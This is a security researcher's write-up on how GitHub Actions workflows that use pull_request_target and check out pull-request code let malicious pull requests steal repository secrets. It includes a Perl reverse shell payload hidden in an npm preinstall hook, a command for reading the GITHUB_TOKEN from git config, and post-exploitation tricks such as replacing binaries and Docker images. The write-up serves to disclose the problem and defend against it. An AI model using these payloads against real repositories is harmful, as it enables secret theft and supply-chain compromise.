Github Actions and the threat of malicious pull requests

March 13, 2021

12/04 update: I have put together a script which can be used to detect Github repos which have workflows that may be vulnerable here: https://gist.github.com/ndavison/d14dbbd9d015eeeef19b923ab80b1f1a. This can be tested against Github orgs or specific repos.

In my previous writeup, titled Shaking secrets out of CircleCI - insecure configuration and the threat of malicious pull requests, I covered a somewhat frighteningly easy way to accidentally configure CircleCI projects in a vulnerable state, allowing pull requests to be submitted that steal tokens and secrets stored within the settings of a CircleCI project. Because CircleCI has deep integrations with Github, and Github doesn't allow public repositories to disable pull requests, such vulnerable configuration would mean a malicious actor could submit a PR at any time of the day, steal the secrets, and clean up behind them, without any interaction required by the repo admins or maintainers.

In this writeup, I'm going to take this same threat - a malicious actor submitting a pull request with the intention of stealing secrets configured within a CI/CD pipeline - and show how it can be realised against a Github repository configured to use Github's own Actions feature. Like CircleCI, this is not a result of a vulnerability in the platform itself, but of vulnerable configuration by the repo owner.

One key attribute of the CircleCI research was the fact a project would only become vulnerable if it was configured in a specific way, as controlled by a private admin configuration UI. While my research outlined ways for blackbox testers to determine with reasonable certainty that a project was configured in a vulnerable state, there was no way to be absolutely sure without actually performing the attack - that didn't mean a project wasn't vulnerable, it just meant finding the needle in the haystack with some sort of finesse was a bit tricky. In contrast, the threat I'm going to outline in this Github Actions research can be confirmed with much more confidence, as Github Actions workflows are configured in the open (for public repos at least), allowing anyone to take a copy of the config and test privately without raising any alarms.

The making of a malicious pull request vulnerability

With CircleCI, the feature at the core of the vulnerable configuration was the ability to define what happens when a pull request from a forked repository is submitted against your repository. More specifically, it was the ability to define what happens with your pipeline's configured secrets - API keys, authentication tokens, and the like - when it executes a pipeline as a result of a pull request from a fork. When someone internal to your Github org submits a PR to a repo, you may want your pipeline to be able to use such secrets to do something privileged, like publish a binary or bundle to a repository. The question then becomes, what happens when someone who isn't internal or privileged in your Github org submits a PR? Usually you would not want anything privileged to happen, and therefore shouldn't need any credentials. However, the use case for doing something privileged is obviously prevalent enough for CircleCI to accommodate it, as the settings detailed in my writeup suggest.

This use case must have caught the attention of a product manager at Github as well, because Actions also supports the ability for pull requests from forked repos to trigger a pipeline with secrets provided. When Github first launched Actions in 2018, this was not the case (or at least, it wasn't intended to be) - in Actions terminology, the pull_request event and its variants were the only events that triggered on a PR being opened from a fork, and these events were deliberately denied access to repo secrets and given only a read-only GITHUB_TOKEN. However, sometime later, in August 2020, the pull_request_target event was added. This event is given repo secrets and a full read/write GITHUB_TOKEN to boot, but there is a catch - a workflow triggered by this event runs in the context of the pull request's target (base) branch, and not the pull request's branch itself. This differs from the CircleCI approach, which happily checked out the pull request's code when it was instructed to share secrets with PRs from forked repositories, including the pipeline configuration in the pull request.

What this means is that, left to its defaults, the pull_request_target event does not use anything from the fork PR when executing the workflow configured for that event; it simply executes the (presumably safe) code and configuration already in the base repo. So unlike CircleCI, a malicious actor can't just submit a PR with the pull_request_target workflow file tampered with to do something nasty, as that code is never used during the pull_request_target workflow.
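As a minimal sketch of that default behaviour, the following workflow runs on pull_request_target but only ever touches code from the base repo. The workflow name, job name and the PR_NUMBER variable are illustrative assumptions rather than anything from a real repo. The point is that actions/checkout, when given no ref or repository arguments, checks out the base branch for this event, and the PR is only referenced through its metadata.

```yaml
name: pr metadata only
on: pull_request_target

jobs:
  pr-info:
    name: Inspect PR metadata
    runs-on: ubuntu-latest
    steps:
      # No ref/repository arguments: for pull_request_target this checks out
      # the base branch, not the code submitted in the pull request.
      - name: Checkout base branch
        uses: actions/checkout@v2
      # Only PR metadata is used, passed through an environment variable
      # rather than interpolated directly into the shell command.
      - name: Print PR number
        run: echo "Triggered by PR number $PR_NUMBER"
        env:
          PR_NUMBER: ${{ github.event.pull_request.number }}
```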

This sounds safe, and it is. The problem comes when people do something unsafe in their repo's pull_request_target configuration, which can basically be summarised as one crucial mistake: using actions/checkout to check out the pull request's repo HEAD, and thus introducing potentially malicious code into the workflow. This mistake may sound unlikely, but it isn't exactly a rarity - I won't link to specific examples of vulnerable configurations in public repositories, but this Github code search may find some, or at least some very near misses that were probably just lucky to escape being vulnerable. Despite the fact Github do warn against this mistake in their documentation for the pull_request_target event, in a bright red box no less, you will likely have little trouble finding examples of repos making it.

An example of vulnerable Github Actions pull_request_target configuration

While I won't link to a real world example of a vulnerable config, I will show what constitutes the bare minimum configuration to make a Github repo vulnerable to malicious pull requests using the pull_request_target event, and then break down what exactly makes it vulnerable. First, here's the example vulnerable configuration that allows an attacker to steal the secret secrets.SOME_SECRET:

name: my action
on: pull_request_target

jobs:
  pr-check:
    name: Check PR
    runs-on: ubuntu-latest
    steps:
      - name: Setup Action
        uses: actions/checkout@v2
        with:
          ref: ${{github.event.pull_request.head.ref}}
          repository: ${{github.event.pull_request.head.repo.full_name}}
      - name: Setup Node
        uses: actions/setup-node@v1
        with:
          node-version: 12.x
      - name: Install dependencies
        run: npm install
      - name: some command
        run: some_command
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}

Before jumping into specifics, the very first thing that enables this configuration to become vulnerable is the on: pull_request_target part - this means the workflow being run is given access to secrets and a full read and write Github token. So, before everything else, for a repo to be vulnerable, it must have a workflow configured to run on the pull_request_target event.

Now, onto analysing the vulnerable configuration. I will break it down in order:

1. The primary mistake is using the actions/checkout@v2 action to check out the pull request's head, which it is doing with the ref: ${{github.event.pull_request.head.ref}} and repository: ${{github.event.pull_request.head.repo.full_name}} arguments. What this is effectively doing is configuring the workflow to use the pull request's code for the rest of the workflow, and that code may be coming from a malicious actor's fork.
2. With that mistake made, the configuration is now vulnerable to exploitation. However, it still needs a vector, or a "sink", for a malicious pull request to target with arbitrary code execution. Can you spot it? Yep, it's the rather innocent looking npm install command. I'll expand on why exactly this is a problem shortly, but for now, just know that this is where malicious code in the pull request executes.
3. Now that the malicious code has had a chance to execute, any step run after it is compromised. The malicious code in this case may replace the binary some_command with something that reads the environment variables the workflow injects into the some command step, specifically $SOME_SECRET, and it's game over - the malicious pull request, and hence the malicious actor, now has this secret.

To elaborate on the second point, the part where the malicious code is executed in npm install, this can be achieved by abusing the scripts feature of npm. Inside a package.json file, you can define shell commands in the "scripts" section that execute during the lifecycle of the npm install process. For example, while researching this writeup, I found the following perl reverse shell payload ($i is the IP and $p is the port for your netcat listener) from the PayloadsAllTheThings repo to work a treat on the Actions ubuntu-latest image, which I have inserted as an npm "preinstall" script:

...
"scripts": {
    "preinstall": "perl -e 'use Socket;$i=\"X.X.X.X\";$p=XXXX;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
}
...

Remember, while the malicious pull request can't modify the workflow configuration itself, it can take advantage of the fact the unsafe actions/checkout@v2 usage has checked out the potentially unsafe code that the rest of the workflow now uses, including the Install dependencies step in my example config. So all a malicious pull request needs to do is modify the repo's package.json file to include malicious code in one of the "scripts" hooks, and the npm install command later in the workflow will execute that malicious code. As mentioned in the last point, such malicious code could replace a binary used later in the workflow that is granted access to secrets, but the options don't stop there - I will cover some more exploitation options in the next section. At this stage, I will drive home one particular key point - in Github Actions, the steps inside a job each run as their own process, but all share the same filesystem. You would of course expect a CI/CD system to share something between steps, but perhaps only the artifacts one stage produces for future stages, such as a node_modules directory - not effectively the whole system, which appears to be how Actions works.
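To make the shared filesystem point concrete, here is a harmless sketch intended for a private test repo. It assumes the ubuntu-latest image, that /usr/local/bin is on the PATH there, and that the runner user can use sudo without a password. The some_command name is the same placeholder used in my example config, and the workflow and step names are made up for illustration. The first step stands in for whatever an attacker's code would do; in a real attack it would be something like an npm install running a PR controlled hook.

```yaml
name: shared filesystem demo
on: push

jobs:
  demo:
    runs-on: ubuntu-latest
    steps:
      # Stand-in for the compromised step: it plants an executable outside
      # the workspace, somewhere later steps will find it on the PATH.
      - name: Earlier step plants a file
        run: |
          printf '#!/bin/sh\necho "some_command was replaced by an earlier step"\n' \
            | sudo tee /usr/local/bin/some_command > /dev/null
          sudo chmod +x /usr/local/bin/some_command
      # A separate process, but the same filesystem: this step runs whatever
      # the earlier step left on disk.
      - name: Later step runs it
        run: some_command
```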

One thing to keep in mind is the npm install step itself is not being used incorrectly, it's just the fact this allows file changes in the pull request's code to influence the Actions workflow that makes it a good target. Here are a few examples of other exploitable execution sinks I have encountered in the wild, all of which were found in a vulnerable pull_request_target + unsafe code checkout workflow:

A fairly common one is pip install -r requirements.txt or a similar pattern. This should allow an attacker to change which python packages are installed to point to one under their control, which should then allow for a post-install hook to be included in the malicious package's setup.py file.
One vulnerable workflow used an action that asked for a "build-script" as an input, which the action would execute on the workflow's checked out code as an npm script. So, just because the workflow may not have an npm install step in plain sight doesn't mean the npm install hooks defined in package.json don't execute during the workflow.
Workflows which execute a local script. This of course could be used in practically unlimited ways, but one example I saw a few times was a workflow which executed a local Gradle wrapper script, often like run: ./gradlew.
I have encountered Github actions repos (that is, code created to be used as an action in other workflows) that are themselves vulnerable, by having an otherwise vulnerable workflow with a uses: ./ step, presumably intended to test the action that the repo hosts by running it as an action. What this means is a malicious PR could simply change the action.yml configuration, or change the script that the configuration already points to in its runs: value, to execute malicious code with access to the read/write repo token. Targeting an action repo like this may be of particular interest to a malicious actor, as compromise could mean compromising many other repos that use the action in their workflows.
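To show roughly what these sinks look like side by side, here is a deliberately vulnerable sketch. It is a composite I have assembled for illustration, not a config taken from any real repo; an actual workflow would typically contain only one of these steps, and the workflow and step names are assumptions. Each commented step consumes a file that the unsafe checkout has pulled in from the pull request.

```yaml
# Deliberately vulnerable - for private testing only.
name: example sinks
on: pull_request_target

jobs:
  pr-check:
    runs-on: ubuntu-latest
    steps:
      # The unsafe checkout: everything below now operates on PR code.
      - name: Checkout PR head
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.ref }}
          repository: ${{ github.event.pull_request.head.repo.full_name }}
      # Sink: requirements.txt is controlled by the PR author.
      - name: Install python dependencies
        run: pip install -r requirements.txt
      # Sink: the Gradle wrapper script is a file in the PR.
      - name: Run Gradle wrapper
        run: ./gradlew
      # Sink: runs the action defined by action.yml in the PR's checkout.
      - name: Test the local action
        uses: ./
```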

These are just a few examples - the sheer number of actions available on Github from the community at large that you can import into your config means any one of them could offer a bespoke way for code in the PR to be executed by the workflow.

Finally, the last point to make on this example configuration is that the secret is only exposed because the malicious execution happens in the Install dependencies step, which runs before the some command step that receives the secret. If the some command step was defined before the Install dependencies step, then it would be safe (this is partly why I chose npm install as an example, as it is something you would expect to occur early in the workflow). Other than the obvious chronological reason, this is also because each step in a job runs as its own process, and so environment variables defined for one step are not available to another. There is, however, one notable exception to this - if you define variables at the job level, then those will be made available to all steps in the job, including of course the step executing malicious code. Also, while not an environment variable, the read/write GITHUB_TOKEN value will be available from inside the workflow regardless of whether secrets are being referenced, which I'll expand on shortly.
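The difference between the two scopes can be sketched as follows. This is an illustrative fragment only: the JOB_WIDE_SECRET and STEP_ONLY_SECRET variable names and the OTHER_SECRET secret are hypothetical, and the checkout here is the default (base branch) one, so the fragment shows scoping rather than a working exploit.

```yaml
name: env scope example
on: pull_request_target

jobs:
  pr-check:
    runs-on: ubuntu-latest
    # Job-level env: injected into the environment of every step below,
    # including Install dependencies.
    env:
      JOB_WIDE_SECRET: ${{ secrets.SOME_SECRET }}
    steps:
      - name: Checkout base branch
        uses: actions/checkout@v2
      - name: Install dependencies
        run: npm install
      - name: some command
        run: some_command
        # Step-level env: only this step's process receives it.
        env:
          STEP_ONLY_SECRET: ${{ secrets.OTHER_SECRET }}
```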

How to take advantage of code execution inside a Github Actions workflow

Now that I've covered how a repo can configure a pull_request_target workflow in a way that creates a malicious pull request vulnerability, and touched on certain sinks an attacker may use to execute their malicious code, what are some ways the code could target steps in the workflow that come after the malicious code executes, keeping in mind that all steps inside a job share a filesystem? Here is what I came up with:

As already covered in the example vulnerable config, if a step uses a binary on the filesystem, malicious code could replace this binary with whatever it likes.
The /etc/resolv.conf or /etc/hosts file could be modified to manipulate DNS results in the execution environment. If a step is using TLS, this could be combined with compromised DNS by adding an attacker controlled CA to the environment's trusted CAs, which means a step's network requests could be manipulated to query an attacker controlled server. The runner user that Actions steps are executed as (in the ubuntu-latest image at least) has password-less sudo access, so basically any configuration file on the filesystem is fair game.
The runner user is also a member of the Docker group, so malicious Docker images can be added to the environment. This means any step in the workflow which uses a Docker image as an action could be compromised. This is because a workflow will create the Docker images before running any steps, so if malicious code replaces a Docker image that is used by a step later in the workflow with something else, the phony Docker image will be used instead.
Even actions themselves in the form of uses: actions/some_action@v1 can be replaced. Like Docker images, these are collected before any steps are executed and placed in the /home/runner/work/_actions/ filesystem location.
Or, if you don't actually care about interfering with a future step in the workflow, you could just steal the full read/write repo token from the filesystem. This lives in the git config file at /home/runner/work/xxx/xxx/.git/config on the step's filesystem, in the "extraheader" git configuration (or you could just execute git config --get http.https://github.com/.extraheader).
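On that last point, one partial mitigation can be sketched like this. As far as I know, actions/checkout@v2 accepts a persist-credentials input which defaults to true, and setting it to false stops the action from leaving the token in the local git config. Treat this as a hedged fragment with made up workflow and job names: it does nothing about the other avenues listed above, and it does not make checking out untrusted code under pull_request_target safe.

```yaml
name: checkout without persisted token
on: pull_request_target

jobs:
  pr-check:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout without persisting credentials
        uses: actions/checkout@v2
        with:
          # Do not write the token into .git/config as an extraheader.
          persist-credentials: false
      # Should print nothing if no extraheader was stored; "|| true" keeps
      # the step from failing when the key is absent.
      - name: Confirm no extraheader is configured
        run: git config --get http.https://github.com/.extraheader || true
```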

There are probably many more avenues to exploit; these are really just the obvious ones you tend to think of when a compromised filesystem is in play. It's worth reiterating that steps in a workflow are only vulnerable to being manipulated if they come after the step which executes the malicious code - so in the example vulnerable configuration, this would be the some command step only, as the malicious code runs in the Install dependencies step.

How to not be vulnerable

Really, the answer to this is simple - if you're using the pull_request_target event in Github Actions, don't use actions/checkout to then check out the pull request's code. If you do, then you are opening yourself up to the malicious pull request attack.
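If all you need is to build or test a contributor's code, a sketch of the unprivileged alternative is to use the plain pull_request event, which for PRs from forks is not given repo secrets and only receives a read-only GITHUB_TOKEN. The workflow below mirrors my vulnerable example minus the secret; the workflow name and the npm test step are assumptions about what such a pipeline might run.

```yaml
name: untrusted pr build
on: pull_request

jobs:
  build:
    name: Build and test PR
    runs-on: ubuntu-latest
    steps:
      # Checking out PR code here is expected: for PRs from forks, this
      # event has no access to repo secrets to steal.
      - name: Checkout PR
        uses: actions/checkout@v2
      - name: Setup Node
        uses: actions/setup-node@v1
        with:
          node-version: 12.x
      - name: Install dependencies
        run: npm install
      - name: Run tests
        run: npm test
```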

If you must combine the two, then make sure you guard your configuration with conditions that only run steps with access to secrets when the pull request being checked out in the workflow is trusted, whatever that means to you and your requirements. If you search Github, you will find configurations that use the if: feature to do something like this - be careful that your logic is not faulty and test, test, test. Use a non-privileged account to fork the repo, and try to exploit it using the techniques covered.
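As one hedged example of such a guard, the sketch below only runs the job when the pull request's head repo is the base repo itself, meaning the branch was pushed by someone who already has write access. That definition of "trusted" is my assumption for the example and may not match yours, and the workflow and job names are made up. Putting the condition at the job level means none of the steps, including the checkout, run for PRs from forks.

```yaml
name: guarded pr target
on: pull_request_target

jobs:
  pr-check:
    name: Check PR (same-repo branches only)
    runs-on: ubuntu-latest
    # Skip the whole job unless the PR comes from a branch in this repo.
    if: github.event.pull_request.head.repo.full_name == github.repository
    steps:
      - name: Checkout PR head
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Install dependencies
        run: npm install
      - name: some command
        run: some_command
        env:
          SOME_SECRET: ${{ secrets.SOME_SECRET }}
```

Testing this from a fork with a non-privileged account should show the job being skipped rather than run.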

In the CircleCI research, I placed a small amount of blame on CircleCI due to what I considered a strange UI which made it very easy to accidentally enable vulnerable configuration. In the case of Github Actions, however, it isn't about a clumsy UI or even a configuration API that is not safe by default, but perhaps about a slight focus on usability and features rather than security. The need for a pull_request_target event which has privileged access to the base repo seems strong in the open source community, and there's only so much a platform can do to prevent configuration mistakes like this. Even so, the way in which the steps in Actions work means that if any of them happen to leave the door open for an attacker, the whole workflow thereafter is compromised thanks to the sharing of a filesystem, which doesn't seem ideal from a security perspective. Then of course you have easy sudo access, Docker access, and the fact images and actions are downloaded prior to any steps, rather than collected at run time (which may have made them harder to replace).

All of this could be argued as an unfortunate side effect of an easy to use and flexible CI/CD platform, so perhaps detection is the next best option - detecting vulnerable Actions workflows is something that could be included in Github's automated security offering, like their service which notifies people when they commit secrets to public repos, or maybe it's something CodeQL could detect and notify for.

After I had done this research, but before publishing this writeup, the Github doco for pull_request_target was updated to include a link to a blog post covering this threat and some mitigation strategies (not to mention assigning this a cool vulnerability class name - pwn requests!). I didn't come across this blog post beforehand but, if I had, I may not have written this post, as frankly not a lot of what I covered here is adding much to that post, although bug hunters may find some value in my focus on how to potentially find vulnerable configs, and demonstrate impact.

As mentioned in my CircleCI writeup, please be considerate if testing for this vulnerability - pull requests on public Github repos are of course open for everyone to see, and sending in a malicious PR, even against a target with a mature bug bounty program, is potentially exposing the target to genuine malicious actors who could take advantage before the target has time to act. My CircleCI writeup has suggestions for reporting this vulnerability to programs based on my own experience of doing so, and with Github Actions, there is really no excuse - just copy the workflow config to your own private repo and test there to confirm the vulnerability.